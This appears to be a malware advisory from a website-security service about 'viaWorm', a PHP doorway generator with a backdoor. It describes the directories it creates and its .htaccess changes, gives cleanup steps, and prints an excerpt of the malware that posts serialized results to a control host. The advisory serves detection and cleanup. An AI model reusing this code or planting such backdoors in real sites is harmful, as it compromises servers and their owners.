viaWorm is a doorway generator that also has backdoor functionality. Known version of this script work with cssstyle.org and stylesheetcss.com. The doorway generator creates the following directory structure in one of the site's writable directies: __links_sources/__pages_sources; __links_sources/__website_config; __links_sources/__sys_source; __links_sources/__pages_map; __links_sources/__links_sources; __links_sources/__links_sources; __links_sources/__website_source
. Inside those directories you can find doorway pages, template, link maps, etc. To make doorways publicly visible, the script makes changes to .htaccess
Affecting
Any servers with enabled PHP
Cleanup
Cleanup is done by deleting this doorway gen file, cleaning .htaccess file and deleting the __links_sources/
directory. Depending on the infection penetration level, there might be other malicious files and open security holes.
You can also sign up with us and let our team remove the malware for you.
Dump
/**
* Class viaWorm
*/
class viaWorm
{
const DADDY_HOST = 'cssstyle.org';
const LINKS_DADDY_HOST = 'stylesheetcss.com';
...
$query = http_build_query(array('worm_result' => serialize($result)));
$worm_precess_url = 'http://' . viaWorm::DADDY_HOST . '/process-worm';
viaWorm::sendPost($worm_precess_url, $query);
echo json_encode($result);
exit();
}